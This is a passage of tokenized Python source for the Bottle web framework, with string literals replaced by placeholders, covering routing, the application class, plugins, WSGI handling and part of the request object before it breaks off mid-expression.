<s> """<STR_LIT>""" <EOL> from __future__ import with_statement <EOL> __author__ = '<STR_LIT>' <EOL> __version__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from optparse import OptionParser <EOL> _cmd_parser = OptionParser ( usage = "<STR_LIT>" ) <EOL> _opt = _cmd_parser . add_option <EOL> _opt ( "<STR_LIT>" , action = "<STR_LIT:store_true>" , help = "<STR_LIT>" ) <EOL> _opt ( "<STR_LIT>" , "<STR_LIT>" , metavar = "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> _opt ( "<STR_LIT>" , "<STR_LIT>" , default = '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> _opt ( "<STR_LIT>" , "<STR_LIT>" , action = "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> _opt ( "<STR_LIT>" , action = "<STR_LIT:store_true>" , help = "<STR_LIT>" ) <EOL> _opt ( "<STR_LIT>" , action = "<STR_LIT:store_true>" , help = "<STR_LIT>" ) <EOL> _cmd_options , _cmd_args = _cmd_parser . parse_args ( ) <EOL> if _cmd_options . server and _cmd_options . server . startswith ( '<STR_LIT>' ) : <EOL> import gevent . monkey ; gevent . monkey . patch_all ( ) <EOL> import base64 , cgi , email . utils , functools , hmac , imp , itertools , mimetypes , os , re , subprocess , sys , tempfile , threading , time , urllib , warnings <EOL> from datetime import date as datedate , datetime , timedelta <EOL> from tempfile import TemporaryFile <EOL> from traceback import format_exc , print_exc <EOL> try : from json import dumps as json_dumps , loads as json_lds <EOL> except ImportError : <EOL> try : from simplejson import dumps as json_dumps , loads as json_lds <EOL> except ImportError : <EOL> try : from django . utils . simplejson import dumps as json_dumps , loads as json_lds <EOL> except ImportError : <EOL> def json_dumps ( data ) : <EOL> raise ImportError ( "<STR_LIT>" ) <EOL> json_lds = json_dumps <EOL> py = sys . version_info <EOL> py3k = py >= ( <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> py25 = py < ( <NUM_LIT:2> , <NUM_LIT:6> , <NUM_LIT:0> ) <EOL> def _e ( ) : return sys . exc_info ( ) [ <NUM_LIT:1> ] <EOL> _stdout , _stderr = sys . stdout . write , sys . stderr . write <EOL> if py3k : <EOL> import http . client as httplib <EOL> import _thread as thread <EOL> from urllib . parse import urljoin , parse_qsl , SplitResult as UrlSplitResult <EOL> from urllib . parse import urlencode , quote as urlquote , unquote as urlunquote <EOL> from http . cookies import SimpleCookie <EOL> from collections import MutableMapping as DictMixin <EOL> import pickle <EOL> from io import BytesIO <EOL> basestring = str <EOL> unicode = str <EOL> json_loads = lambda s : json_lds ( touni ( s ) ) <EOL> callable = lambda x : hasattr ( x , '<STR_LIT>' ) <EOL> imap = map <EOL> else : <EOL> import httplib <EOL> import thread <EOL> from urlparse import urljoin , SplitResult as UrlSplitResult <EOL> from urllib import urlencode , quote as urlquote , unquote as urlunquote <EOL> from Cookie import SimpleCookie <EOL> from itertools import imap <EOL> import cPickle as pickle <EOL> from StringIO import StringIO as BytesIO <EOL> if py25 : <EOL> msg = "<STR_LIT>" <EOL> warnings . warn ( msg , DeprecationWarning ) <EOL> from cgi import parse_qsl <EOL> from UserDict import DictMixin <EOL> def next ( it ) : return it . next ( ) <EOL> bytes = str <EOL> else : <EOL> from urlparse import parse_qsl <EOL> from collections import MutableMapping as DictMixin <EOL> json_loads = json_lds <EOL> def tob ( s , enc = '<STR_LIT:utf8>' ) : <EOL> return s . encode ( enc ) if isinstance ( s , unicode ) else bytes ( s ) <EOL> def touni ( s , enc = '<STR_LIT:utf8>' , err = '<STR_LIT:strict>' ) : <EOL> return s . decode ( enc , err ) if isinstance ( s , bytes ) else unicode ( s ) <EOL> tonat = touni if py3k else tob <EOL> NCTextIOWrapper = None <EOL> if ( <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:0> ) < py < ( <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:0> ) : <EOL> from io import TextIOWrapper <EOL> class NCTextIOWrapper ( TextIOWrapper ) : <EOL> def close ( self ) : pass <EOL> def update_wrapper ( wrapper , wrapped , * a , ** ka ) : <EOL> try : functools . update_wrapper ( wrapper , wrapped , * a , ** ka ) <EOL> except AttributeError : pass <EOL> def depr ( message ) : <EOL> warnings . warn ( message , DeprecationWarning , stacklevel = <NUM_LIT:3> ) <EOL> def makelist ( data ) : <EOL> if isinstance ( data , ( tuple , list , set , dict ) ) : return list ( data ) <EOL> elif data : return [ data ] <EOL> else : return [ ] <EOL> class DictProperty ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , attr , key = None , read_only = False ) : <EOL> self . attr , self . key , self . read_only = attr , key , read_only <EOL> def __call__ ( self , func ) : <EOL> functools . update_wrapper ( self , func , updated = [ ] ) <EOL> self . getter , self . key = func , self . key or func . __name__ <EOL> return self <EOL> def __get__ ( self , obj , cls ) : <EOL> if obj is None : return self <EOL> key , storage = self . key , getattr ( obj , self . attr ) <EOL> if key not in storage : storage [ key ] = self . getter ( obj ) <EOL> return storage [ key ] <EOL> def __set__ ( self , obj , value ) : <EOL> if self . read_only : raise AttributeError ( "<STR_LIT>" ) <EOL> getattr ( obj , self . attr ) [ self . key ] = value <EOL> def __delete__ ( self , obj ) : <EOL> if self . read_only : raise AttributeError ( "<STR_LIT>" ) <EOL> del getattr ( obj , self . attr ) [ self . key ] <EOL> class cached_property ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , func ) : <EOL> self . func = func <EOL> def __get__ ( self , obj , cls ) : <EOL> if obj is None : return self <EOL> value = obj . __dict__ [ self . func . __name__ ] = self . func ( obj ) <EOL> return value <EOL> class lazy_attribute ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , func ) : <EOL> functools . update_wrapper ( self , func , updated = [ ] ) <EOL> self . getter = func <EOL> def __get__ ( self , obj , cls ) : <EOL> value = self . getter ( cls ) <EOL> setattr ( cls , self . __name__ , value ) <EOL> return value <EOL> class BottleException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class HTTPResponse ( BottleException ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , output = '<STR_LIT>' , status = <NUM_LIT:200> , header = None ) : <EOL> super ( BottleException , self ) . __init__ ( "<STR_LIT>" % status ) <EOL> self . status = int ( status ) <EOL> self . output = output <EOL> self . headers = HeaderDict ( header ) if header else None <EOL> def apply ( self , response ) : <EOL> if self . headers : <EOL> for key , value in self . headers . allitems ( ) : <EOL> response . headers [ key ] = value <EOL> response . status = self . status <EOL> class HTTPError ( HTTPResponse ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , code = <NUM_LIT> , output = '<STR_LIT>' , exception = None , <EOL> traceback = None , header = None ) : <EOL> super ( HTTPError , self ) . __init__ ( output , code , header ) <EOL> self . exception = exception <EOL> self . traceback = traceback <EOL> def __repr__ ( self ) : <EOL> return tonat ( template ( ERROR_PAGE_TEMPLATE , e = self ) ) <EOL> class RouteError ( BottleException ) : <EOL> """<STR_LIT>""" <EOL> class RouteReset ( BottleException ) : <EOL> """<STR_LIT>""" <EOL> class RouterUnknownModeError ( RouteError ) : pass <EOL> class RouteSyntaxError ( RouteError ) : <EOL> """<STR_LIT>""" <EOL> class RouteBuildError ( RouteError ) : <EOL> """<STR_LIT>""" <EOL> class Router ( object ) : <EOL> '''<STR_LIT>''' <EOL> default_pattern = '<STR_LIT>' <EOL> default_filter = '<STR_LIT>' <EOL> rule_syntax = re . compile ( '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' ) <EOL> def __init__ ( self , strict = False ) : <EOL> self . rules = { } <EOL> self . builder = { } <EOL> self . static = { } <EOL> self . dynamic = [ ] <EOL> self . strict_order = strict <EOL> self . filters = { '<STR_LIT>' : self . re_filter , '<STR_LIT:int>' : self . int_filter , <EOL> '<STR_LIT:float>' : self . float_filter , '<STR_LIT:path>' : self . path_filter } <EOL> def re_filter ( self , conf ) : <EOL> return conf or self . default_pattern , None , None <EOL> def int_filter ( self , conf ) : <EOL> return r'<STR_LIT>' , int , lambda x : str ( int ( x ) ) <EOL> def float_filter ( self , conf ) : <EOL> return r'<STR_LIT>' , float , lambda x : str ( float ( x ) ) <EOL> def path_filter ( self , conf ) : <EOL> return r'<STR_LIT>' , None , None <EOL> def add_filter ( self , name , func ) : <EOL> '''<STR_LIT>''' <EOL> self . filters [ name ] = func <EOL> def parse_rule ( self , rule ) : <EOL> '''<STR_LIT>''' <EOL> offset , prefix = <NUM_LIT:0> , '<STR_LIT>' <EOL> for match in self . rule_syntax . finditer ( rule ) : <EOL> prefix += rule [ offset : match . start ( ) ] <EOL> g = match . groups ( ) <EOL> if len ( g [ <NUM_LIT:0> ] ) % <NUM_LIT:2> : <EOL> prefix += match . group ( <NUM_LIT:0> ) [ len ( g [ <NUM_LIT:0> ] ) : ] <EOL> offset = match . end ( ) <EOL> continue <EOL> if prefix : yield prefix , None , None <EOL> name , filtr , conf = g [ <NUM_LIT:1> : <NUM_LIT:4> ] if not g [ <NUM_LIT:2> ] is None else g [ <NUM_LIT:4> : <NUM_LIT:7> ] <EOL> if not filtr : filtr = self . default_filter <EOL> yield name , filtr , conf or None <EOL> offset , prefix = match . end ( ) , '<STR_LIT>' <EOL> if offset <= len ( rule ) or prefix : <EOL> yield prefix + rule [ offset : ] , None , None <EOL> def add ( self , rule , method , target , name = None ) : <EOL> '''<STR_LIT>''' <EOL> if rule in self . rules : <EOL> self . rules [ rule ] [ method ] = target <EOL> if name : self . builder [ name ] = self . builder [ rule ] <EOL> return <EOL> target = self . rules [ rule ] = { method : target } <EOL> anons = <NUM_LIT:0> <EOL> pattern = '<STR_LIT>' <EOL> filters = [ ] <EOL> builder = [ ] <EOL> is_static = True <EOL> for key , mode , conf in self . parse_rule ( rule ) : <EOL> if mode : <EOL> is_static = False <EOL> mask , in_filter , out_filter = self . filters [ mode ] ( conf ) <EOL> if key : <EOL> pattern += '<STR_LIT>' % ( key , mask ) <EOL> else : <EOL> pattern += '<STR_LIT>' % mask <EOL> key = '<STR_LIT>' % anons ; anons += <NUM_LIT:1> <EOL> if in_filter : filters . append ( ( key , in_filter ) ) <EOL> builder . append ( ( key , out_filter or str ) ) <EOL> elif key : <EOL> pattern += re . escape ( key ) <EOL> builder . append ( ( None , key ) ) <EOL> self . builder [ rule ] = builder <EOL> if name : self . builder [ name ] = builder <EOL> if is_static and not self . strict_order : <EOL> self . static [ self . build ( rule ) ] = target <EOL> return <EOL> def fpat_sub ( m ) : <EOL> return m . group ( <NUM_LIT:0> ) if len ( m . group ( <NUM_LIT:1> ) ) % <NUM_LIT:2> else m . group ( <NUM_LIT:1> ) + '<STR_LIT>' <EOL> flat_pattern = re . sub ( r'<STR_LIT>' , fpat_sub , pattern ) <EOL> try : <EOL> re_match = re . compile ( '<STR_LIT>' % pattern ) . match <EOL> except re . error : <EOL> raise RouteSyntaxError ( "<STR_LIT>" % ( rule , _e ( ) ) ) <EOL> def match ( path ) : <EOL> """<STR_LIT>""" <EOL> url_args = re_match ( path ) . groupdict ( ) <EOL> for name , wildcard_filter in filters : <EOL> try : <EOL> url_args [ name ] = wildcard_filter ( url_args [ name ] ) <EOL> except ValueError : <EOL> raise HTTPError ( <NUM_LIT> , '<STR_LIT>' ) <EOL> return url_args <EOL> try : <EOL> combined = '<STR_LIT>' % ( self . dynamic [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] . pattern , flat_pattern ) <EOL> self . dynamic [ - <NUM_LIT:1> ] = ( re . compile ( combined ) , self . dynamic [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) <EOL> self . dynamic [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] . append ( ( match , target ) ) <EOL> except ( AssertionError , IndexError ) : <EOL> self . dynamic . append ( ( re . compile ( '<STR_LIT>' % flat_pattern ) , <EOL> [ ( match , target ) ] ) ) <EOL> return match <EOL> def build ( self , _name , * anons , ** query ) : <EOL> '''<STR_LIT>''' <EOL> builder = self . builder . get ( _name ) <EOL> if not builder : raise RouteBuildError ( "<STR_LIT>" , _name ) <EOL> try : <EOL> for i , value in enumerate ( anons ) : query [ '<STR_LIT>' % i ] = value <EOL> url = '<STR_LIT>' . join ( [ f ( query . pop ( n ) ) if n else f for ( n , f ) in builder ] ) <EOL> return url if not query else url + '<STR_LIT:?>' + urlencode ( query ) <EOL> except KeyError : <EOL> raise RouteBuildError ( '<STR_LIT>' % _e ( ) . args [ <NUM_LIT:0> ] ) <EOL> def match ( self , environ ) : <EOL> '''<STR_LIT>''' <EOL> path , targets , urlargs = environ [ '<STR_LIT>' ] or '<STR_LIT:/>' , None , { } <EOL> if path in self . static : <EOL> targets = self . static [ path ] <EOL> else : <EOL> for combined , rules in self . dynamic : <EOL> match = combined . match ( path ) <EOL> if not match : continue <EOL> getargs , targets = rules [ match . lastindex - <NUM_LIT:1> ] <EOL> urlargs = getargs ( path ) if getargs else { } <EOL> break <EOL> if not targets : <EOL> raise HTTPError ( <NUM_LIT> , "<STR_LIT>" + repr ( environ [ '<STR_LIT>' ] ) ) <EOL> method = environ [ '<STR_LIT>' ] . upper ( ) <EOL> if method in targets : <EOL> return targets [ method ] , urlargs <EOL> if method == '<STR_LIT>' and '<STR_LIT:GET>' in targets : <EOL> return targets [ '<STR_LIT:GET>' ] , urlargs <EOL> if '<STR_LIT>' in targets : <EOL> return targets [ '<STR_LIT>' ] , urlargs <EOL> allowed = [ verb for verb in targets if verb != '<STR_LIT>' ] <EOL> if '<STR_LIT:GET>' in allowed and '<STR_LIT>' not in allowed : <EOL> allowed . append ( '<STR_LIT>' ) <EOL> raise HTTPError ( <NUM_LIT> , "<STR_LIT>" , <EOL> header = [ ( '<STR_LIT>' , "<STR_LIT:U+002C>" . join ( allowed ) ) ] ) <EOL> class Route ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , app , rule , method , callback , name = None , <EOL> plugins = None , skiplist = None , ** config ) : <EOL> self . app = app <EOL> self . rule = rule <EOL> self . method = method <EOL> self . callback = callback <EOL> self . name = name or None <EOL> self . plugins = plugins or [ ] <EOL> self . skiplist = skiplist or [ ] <EOL> self . config = ConfigDict ( config ) <EOL> def __call__ ( self , * a , ** ka ) : <EOL> depr ( "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" ) <EOL> return self . call ( * a , ** ka ) <EOL> @ cached_property <EOL> def call ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . _make_callback ( ) <EOL> def reset ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . __dict__ . pop ( '<STR_LIT>' , None ) <EOL> def prepare ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . call <EOL> @ property <EOL> def _context ( self ) : <EOL> depr ( '<STR_LIT>' ) <EOL> return dict ( rule = self . rule , method = self . method , callback = self . callback , <EOL> name = self . name , app = self . app , config = self . config , <EOL> apply = self . plugins , skip = self . skiplist ) <EOL> def all_plugins ( self ) : <EOL> '''<STR_LIT>''' <EOL> unique = set ( ) <EOL> for p in reversed ( self . app . plugins + self . plugins ) : <EOL> if True in self . skiplist : break <EOL> name = getattr ( p , '<STR_LIT:name>' , False ) <EOL> if name and ( name in self . skiplist or name in unique ) : continue <EOL> if p in self . skiplist or type ( p ) in self . skiplist : continue <EOL> if name : unique . add ( name ) <EOL> yield p <EOL> def _make_callback ( self ) : <EOL> callback = self . callback <EOL> for plugin in self . all_plugins ( ) : <EOL> try : <EOL> if hasattr ( plugin , '<STR_LIT>' ) : <EOL> api = getattr ( plugin , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> context = self if api > <NUM_LIT:1> else self . _context <EOL> callback = plugin . apply ( callback , context ) <EOL> else : <EOL> callback = plugin ( callback ) <EOL> except RouteReset : <EOL> return self . _make_callback ( ) <EOL> if not callback is self . callback : <EOL> update_wrapper ( callback , self . callback ) <EOL> return callback <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . method , self . rule , self . callback ) <EOL> class Bottle ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , catchall = True , autojson = True ) : <EOL> self . catchall = catchall <EOL> self . resources = ResourceManager ( ) <EOL> self . config = ConfigDict ( ) <EOL> self . config . autojson = autojson <EOL> self . routes = [ ] <EOL> self . router = Router ( ) <EOL> self . error_handler = { } <EOL> self . plugins = [ ] <EOL> self . hooks = HooksPlugin ( ) <EOL> self . install ( self . hooks ) <EOL> if self . config . autojson : <EOL> self . install ( JSONPlugin ( ) ) <EOL> self . install ( TemplatePlugin ( ) ) <EOL> def mount ( self , prefix , app , ** options ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( app , basestring ) : <EOL> prefix , app = app , prefix <EOL> depr ( '<STR_LIT>' ) <EOL> parts = [ p for p in prefix . split ( '<STR_LIT:/>' ) if p ] <EOL> if not parts : raise ValueError ( '<STR_LIT>' ) <EOL> path_depth = len ( parts ) <EOL> options . setdefault ( '<STR_LIT>' , True ) <EOL> options . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ self . route ( '<STR_LIT>' % '<STR_LIT:/>' . join ( parts ) , ** options ) <EOL> def mountpoint ( ) : <EOL> try : <EOL> request . path_shift ( path_depth ) <EOL> rs = BaseResponse ( [ ] , <NUM_LIT:200> ) <EOL> def start_response ( status , header ) : <EOL> rs . status = status <EOL> for name , value in header : rs . add_header ( name , value ) <EOL> return rs . body . append <EOL> rs . body = itertools . chain ( rs . body , app ( request . environ , start_response ) ) <EOL> return HTTPResponse ( rs . body , rs . status_code , rs . headers ) <EOL> finally : <EOL> request . path_shift ( - path_depth ) <EOL> if not prefix . endswith ( '<STR_LIT:/>' ) : <EOL> self . route ( '<STR_LIT:/>' + '<STR_LIT:/>' . join ( parts ) , callback = mountpoint , ** options ) <EOL> def merge ( self , routes ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( routes , Bottle ) : <EOL> routes = routes . routes <EOL> for route in routes : <EOL> self . add_route ( route ) <EOL> def install ( self , plugin ) : <EOL> '''<STR_LIT>''' <EOL> if hasattr ( plugin , '<STR_LIT>' ) : plugin . setup ( self ) <EOL> if not callable ( plugin ) and not hasattr ( plugin , '<STR_LIT>' ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> self . plugins . append ( plugin ) <EOL> self . reset ( ) <EOL> return plugin <EOL> def uninstall ( self , plugin ) : <EOL> '''<STR_LIT>''' <EOL> removed , remove = [ ] , plugin <EOL> for i , plugin in list ( enumerate ( self . plugins ) ) [ : : - <NUM_LIT:1> ] : <EOL> if remove is True or remove is plugin or remove is type ( plugin ) or getattr ( plugin , '<STR_LIT:name>' , True ) == remove : <EOL> removed . append ( plugin ) <EOL> del self . plugins [ i ] <EOL> if hasattr ( plugin , '<STR_LIT>' ) : plugin . close ( ) <EOL> if removed : self . reset ( ) <EOL> return removed <EOL> def run ( self , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> run ( self , ** kwargs ) <EOL> def reset ( self , route = None ) : <EOL> '''<STR_LIT>''' <EOL> if route is None : routes = self . routes <EOL> elif isinstance ( route , Route ) : routes = [ route ] <EOL> else : routes = [ self . routes [ route ] ] <EOL> for route in routes : route . reset ( ) <EOL> if DEBUG : <EOL> for route in routes : route . prepare ( ) <EOL> self . hooks . trigger ( '<STR_LIT>' ) <EOL> def close ( self ) : <EOL> '''<STR_LIT>''' <EOL> for plugin in self . plugins : <EOL> if hasattr ( plugin , '<STR_LIT>' ) : plugin . close ( ) <EOL> self . stopped = True <EOL> def match ( self , environ ) : <EOL> """<STR_LIT>""" <EOL> return self . router . match ( environ ) <EOL> def get_url ( self , routename , ** kargs ) : <EOL> """<STR_LIT>""" <EOL> scriptname = request . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . strip ( '<STR_LIT:/>' ) + '<STR_LIT:/>' <EOL> location = self . router . build ( routename , ** kargs ) . lstrip ( '<STR_LIT:/>' ) <EOL> return urljoin ( urljoin ( '<STR_LIT:/>' , scriptname ) , location ) <EOL> def add_route ( self , route ) : <EOL> '''<STR_LIT>''' <EOL> self . routes . append ( route ) <EOL> self . router . add ( route . rule , route . method , route , name = route . name ) <EOL> if DEBUG : route . prepare ( ) <EOL> def route ( self , path = None , method = '<STR_LIT:GET>' , callback = None , name = None , <EOL> apply = None , skip = None , ** config ) : <EOL> """<STR_LIT>""" <EOL> if callable ( path ) : path , callback = None , path <EOL> plugins = makelist ( apply ) <EOL> skiplist = makelist ( skip ) <EOL> def decorator ( callback ) : <EOL> if isinstance ( callback , basestring ) : callback = load ( callback ) <EOL> for rule in makelist ( path ) or yieldroutes ( callback ) : <EOL> for verb in makelist ( method ) : <EOL> verb = verb . upper ( ) <EOL> route = Route ( self , rule , verb , callback , name = name , <EOL> plugins = plugins , skiplist = skiplist , ** config ) <EOL> self . add_route ( route ) <EOL> return callback <EOL> return decorator ( callback ) if callback else decorator <EOL> def get ( self , path = None , method = '<STR_LIT:GET>' , ** options ) : <EOL> """<STR_LIT>""" <EOL> return self . route ( path , method , ** options ) <EOL> def post ( self , path = None , method = '<STR_LIT:POST>' , ** options ) : <EOL> """<STR_LIT>""" <EOL> return self . route ( path , method , ** options ) <EOL> def put ( self , path = None , method = '<STR_LIT>' , ** options ) : <EOL> """<STR_LIT>""" <EOL> return self . route ( path , method , ** options ) <EOL> def delete ( self , path = None , method = '<STR_LIT>' , ** options ) : <EOL> """<STR_LIT>""" <EOL> return self . route ( path , method , ** options ) <EOL> def error ( self , code = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> def wrapper ( handler ) : <EOL> self . error_handler [ int ( code ) ] = handler <EOL> return handler <EOL> return wrapper <EOL> def hook ( self , name ) : <EOL> """<STR_LIT>""" <EOL> def wrapper ( func ) : <EOL> self . hooks . add ( name , func ) <EOL> return func <EOL> return wrapper <EOL> def handle ( self , path , method = '<STR_LIT:GET>' ) : <EOL> """<STR_LIT>""" <EOL> depr ( "<STR_LIT>" ) <EOL> if isinstance ( path , dict ) : <EOL> return self . _handle ( path ) <EOL> return self . _handle ( { '<STR_LIT>' : path , '<STR_LIT>' : method . upper ( ) } ) <EOL> def _handle ( self , environ ) : <EOL> try : <EOL> environ [ '<STR_LIT>' ] = self <EOL> request . bind ( environ ) <EOL> response . bind ( ) <EOL> route , args = self . router . match ( environ ) <EOL> environ [ '<STR_LIT>' ] = environ [ '<STR_LIT>' ] = route <EOL> environ [ '<STR_LIT>' ] = args <EOL> return route . call ( ** args ) <EOL> except HTTPResponse : <EOL> return _e ( ) <EOL> except RouteReset : <EOL> route . reset ( ) <EOL> return self . _handle ( environ ) <EOL> except ( KeyboardInterrupt , SystemExit , MemoryError ) : <EOL> raise <EOL> except Exception : <EOL> if not self . catchall : raise <EOL> stacktrace = format_exc ( <NUM_LIT:10> ) <EOL> environ [ '<STR_LIT>' ] . write ( stacktrace ) <EOL> return HTTPError ( <NUM_LIT> , "<STR_LIT>" , _e ( ) , stacktrace ) <EOL> def _cast ( self , out , peek = None ) : <EOL> """<STR_LIT>""" <EOL> if not out : <EOL> response [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> return [ ] <EOL> if isinstance ( out , ( tuple , list ) ) and isinstance ( out [ <NUM_LIT:0> ] , ( bytes , unicode ) ) : <EOL> out = out [ <NUM_LIT:0> ] [ <NUM_LIT:0> : <NUM_LIT:0> ] . join ( out ) <EOL> if isinstance ( out , unicode ) : <EOL> out = out . encode ( response . charset ) <EOL> if isinstance ( out , bytes ) : <EOL> response [ '<STR_LIT>' ] = len ( out ) <EOL> return [ out ] <EOL> if isinstance ( out , HTTPError ) : <EOL> out . apply ( response ) <EOL> out = self . error_handler . get ( out . status , repr ) ( out ) <EOL> if isinstance ( out , HTTPResponse ) : <EOL> depr ( '<STR_LIT>' ) <EOL> return self . _cast ( out ) <EOL> if isinstance ( out , HTTPResponse ) : <EOL> out . apply ( response ) <EOL> return self . _cast ( out . output ) <EOL> if hasattr ( out , '<STR_LIT>' ) : <EOL> if '<STR_LIT>' in request . environ : <EOL> return request . environ [ '<STR_LIT>' ] ( out ) <EOL> elif hasattr ( out , '<STR_LIT>' ) or not hasattr ( out , '<STR_LIT>' ) : <EOL> return WSGIFileWrapper ( out ) <EOL> try : <EOL> out = iter ( out ) <EOL> first = next ( out ) <EOL> while not first : <EOL> first = next ( out ) <EOL> except StopIteration : <EOL> return self . _cast ( '<STR_LIT>' ) <EOL> except HTTPResponse : <EOL> first = _e ( ) <EOL> except ( KeyboardInterrupt , SystemExit , MemoryError ) : <EOL> raise <EOL> except Exception : <EOL> if not self . catchall : raise <EOL> first = HTTPError ( <NUM_LIT> , '<STR_LIT>' , _e ( ) , format_exc ( <NUM_LIT:10> ) ) <EOL> if isinstance ( first , HTTPResponse ) : <EOL> return self . _cast ( first ) <EOL> if isinstance ( first , bytes ) : <EOL> return itertools . chain ( [ first ] , out ) <EOL> if isinstance ( first , unicode ) : <EOL> return imap ( lambda x : x . encode ( response . charset ) , <EOL> itertools . chain ( [ first ] , out ) ) <EOL> return self . _cast ( HTTPError ( <NUM_LIT> , '<STR_LIT>' % type ( first ) ) ) <EOL> def wsgi ( self , environ , start_response ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> out = self . _cast ( self . _handle ( environ ) ) <EOL> if response . _status_code in ( <NUM_LIT:100> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) or request . method == '<STR_LIT>' : <EOL> if hasattr ( out , '<STR_LIT>' ) : out . close ( ) <EOL> out = [ ] <EOL> if isinstance ( response . _status_line , unicode ) : <EOL> response . _status_line = str ( response . _status_line ) <EOL> start_response ( response . _status_line , list ( response . iter_headers ( ) ) ) <EOL> return out <EOL> except ( KeyboardInterrupt , SystemExit , MemoryError ) : <EOL> raise <EOL> except Exception : <EOL> if not self . catchall : raise <EOL> err = '<STR_LIT>' % html_escape ( environ . get ( '<STR_LIT>' , '<STR_LIT:/>' ) ) <EOL> if DEBUG : <EOL> err += '<STR_LIT>' '<STR_LIT>' % ( html_escape ( repr ( _e ( ) ) ) , html_escape ( format_exc ( <NUM_LIT:10> ) ) ) <EOL> environ [ '<STR_LIT>' ] . write ( err ) <EOL> headers = [ ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) ] <EOL> start_response ( '<STR_LIT>' , headers ) <EOL> return [ tob ( err ) ] <EOL> def __call__ ( self , environ , start_response ) : <EOL> '''<STR_LIT>''' <EOL> return self . wsgi ( environ , start_response ) <EOL> class BaseRequest ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT>' ) <EOL> MEMFILE_MAX = <NUM_LIT> <EOL> MAX_PARAMS = <NUM_LIT:100> <EOL> def __init__ ( self , environ = None ) : <EOL> """<STR_LIT>""" <EOL> self . environ = { } if environ is None else environ <EOL> self . environ [ '<STR_LIT>' ] = self <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def app ( self ) : <EOL> '''<STR_LIT>''' <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> @ property <EOL> def path ( self ) : <EOL> '''<STR_LIT>''' <EOL> return '<STR_LIT:/>' + self . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . lstrip ( '<STR_LIT:/>' ) <EOL> @ property <EOL> def method ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . environ . get ( '<STR_LIT>' , '<STR_LIT:GET>' ) . upper ( ) <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def headers ( self ) : <EOL> '''<STR_LIT>''' <EOL> return WSGIHeaderDict ( self . environ ) <EOL> def get_header ( self , name , default = None ) : <EOL> '''<STR_LIT>''' <EOL> return self . headers . get ( name , default ) <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def cookies ( self ) : <EOL> """<STR_LIT>""" <EOL> cookies = SimpleCookie ( self . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> cookies = list ( cookies . values ( ) ) [ : self . MAX_PARAMS ] <EOL> return FormsDict ( ( c . key , c . value ) for c in cookies ) <EOL> def get_cookie ( self , key , default = None , secret = None ) : <EOL> """<STR_LIT>""" <EOL> value = self . cookies . get ( key ) <EOL> if secret and value : <EOL> dec = cookie_decode ( value , secret ) <EOL> return dec [ <NUM_LIT:1> ] if dec and dec [ <NUM_LIT:0> ] == key else default <EOL> return value or default <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def query ( self ) : <EOL> '''<STR_LIT>''' <EOL> pairs = parse_qsl ( self . query_string , keep_blank_values = True ) <EOL> get = self . environ [ '<STR_LIT>' ] = FormsDict ( ) <EOL> for key , value in pairs [ : self . MAX_PARAMS ] : <EOL> get [ key ] = value <EOL> return get <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def forms ( self ) : <EOL> """<STR_LIT>""" <EOL> forms = FormsDict ( ) <EOL> for name , item in self . POST . allitems ( ) : <EOL> if not hasattr ( item , '<STR_LIT:filename>' ) : <EOL> forms [ name ] = item <EOL> return forms <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def params ( self ) : <EOL> """<STR_LIT>""" <EOL> params = FormsDict ( ) <EOL> for key , value in self . query . allitems ( ) : <EOL> params [ key ] = value <EOL> for key , value in self . forms . allitems ( ) : <EOL> params [ key ] = value <EOL> return params <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def files ( self ) : <EOL> """<STR_LIT>""" <EOL> files = FormsDict ( ) <EOL> for name , item in self . POST . allitems ( ) : <EOL> if hasattr ( item 